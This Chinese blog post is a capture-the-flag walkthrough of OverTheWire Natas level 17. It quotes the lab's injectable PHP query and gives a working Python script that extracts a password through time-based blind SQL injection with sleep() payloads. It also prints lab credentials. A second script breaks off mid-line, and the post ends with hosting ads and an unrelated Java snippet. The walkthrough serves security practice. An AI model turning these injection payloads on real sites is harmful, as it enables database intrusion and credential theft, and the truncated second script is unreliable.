OverTheWire攻关过程-Natas模块17

Posted on by hackdl

我们打开lv17,查看信息

查看源代码

<?php /*
CREATE TABLE `users` (
  `username` varchar(64) DEFAULT NULL,
  `password` varchar(64) DEFAULT NULL
);
*/

if(array_key_exists("username", $_REQUEST)) {
    $link = mysqli_connect('localhost', 'natas17', '');
    mysqli_select_db($link, 'natas17');

    $query = "SELECT * from users where username="".$_REQUEST["username"].""";
    if(array_key_exists("debug", $_GET)) {
        echo "Executing query: $query
";
    }

    $res = mysqli_query($link, $query);
    if($res) {
    if(mysqli_num_rows($res) > 0) {
        //echo "This user exists.
";
    } else {
        //echo "This user doesn't exist.
";
    }
    } else {
        //echo "Error in query.
";
    }

    mysqli_close($link);
} else {
?>

发现主要的SQL查询语句

这种sql盲注的语句,参考大神的思路

通过sleep(5)来判断是否执行

SELECT * from users where username="_natas18" and password like binary '%a%' and sleep(5) #

语句为以上注入形式

python脚本代码如下

import requests  
from requests.auth import HTTPBasicAuth  
  
Auth=HTTPBasicAuth('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')  
headers = {'content-type': 'application/x-www-form-urlencoded'}  
filteredchars = ''  
passwd = ''  
allchars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'  
  
for char in allchars:  
        payload = 'username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23'.format(char)  
        r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)  
        if(r.elapsed.seconds >= 1):  
                filteredchars = filteredchars + char  
                print(filteredchars)  
  
print(filteredchars)  
  
for i in range(0,32):  
        for char in filteredchars:  
                payload = 'username=natas18%22%20and%20password%20like%20binary%20'{0}%25'%20and%20sleep(1)%23'.format(passwd + char)  
                r = requests.post('http://natas17.natas.labs.overthewire.org/index.php', auth=Auth, data=payload, headers=headers)  
                if(r.elapsed.seconds >= 1):  
                        passwd = passwd + char  
                        print(passwd)  
                        break

我们使用vscode进行计算

python3.10的脚本

# coding:utf-8
import requests
url = 'http://natas17:XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd@natas17.natas.labs.overthewire.org/index.php'
key = ''

for i in range(1, 33):
    a = 32
    c = 126
    while a

不过时间改为10秒钟,耐心等待即可

得出密码

8NEDUUxg8kFgPV84uLwvZkGn6okJQ6aq

验证密码

服务器托管,北京服务器托管,服务器租用 http://www.fwqtg.net
机房租用,北京机房租用,IDC机房托管, http://www.fwqtg.net

相关推荐: Java中double类型四舍五入的方法总结

代码: double a = 13.245;   //方法一: BigDecimal bd= new BigDecimal(a); Double b = bd.setScale(2, BigDecimal.ROUND_HALF_UP).doubleValue(…

服务器托管,北京服务器托管,服务器租用,机房机柜带宽租用

服务器托管

咨询:董先生

电话13051898268 QQ/微信93663045!

上一篇:
下一篇: